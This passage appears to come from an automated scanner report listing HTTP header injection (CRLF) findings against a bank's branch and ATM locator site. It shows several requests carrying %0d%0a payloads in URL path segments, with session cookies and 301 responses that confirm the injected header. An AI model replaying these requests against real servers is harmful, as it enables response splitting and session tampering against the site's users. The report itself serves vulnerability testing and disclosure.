cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:13 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=9F8217DEC4A438C2A6E771E48CC4473F.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/a6e8c 4043d28ed85?startIndex=11&shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 7d639%0d%0a18378f68d8f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/7d639%0d%0a18378f68d8f HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:43 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=054A1AC58055CB589BCB78DC2ECD14CB.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/7d639 18378f68d8f?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload ed65f%0d%0a14354dbc267 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/ed65f%0d%0a14354dbc267 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:42 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=C3EBC3E03703721EACFA2B3D981121E0.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/ed65f 14354dbc267?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload fefde%0d%0ae8b7e68b19f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/fefde%0d%0ae8b7e68b19f/coverage.html HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:11 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=F536DC470A288C37113D6EC22818ACD3.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/fefde e8b7e68b19f/coverage.html?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/html
The value of REST URL parameter 4 is copied into the Location response header. The payload f946b%0d%0ad96a7bf4518 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/branch_and_atm_locations/f946b%0d%0ad96a7bf4518 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:44 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=A30F35114C3637AB0EBDDE94938652CD.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/branch_and_atm_locations/f946b d96a7bf4518?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 233d9%0d%0a753880cc02b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/233d9%0d%0a753880cc02b/ProfilePage.jsp HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:28 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=33CF8B44D1072B7594DDD71194254CA8.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/233d9 753880cc02b/ProfilePage.jsp?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 718fe%0d%0ac90885f1317 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/jsp/718fe%0d%0ac90885f1317 HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:05 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=9BB79E207F58B04552A09A87871FB7BD.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/jsp/718fe c90885f1317?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 13b0c%0d%0ac70e0133fce was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/13b0c%0d%0ac70e0133fce/SearchPage.jsp HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:41:22 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=C7213467D73CDDB6065C85EEC617851B.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/13b0c c70e0133fce/SearchPage.jsp?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 85c0d%0d%0ac791951d1f5 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
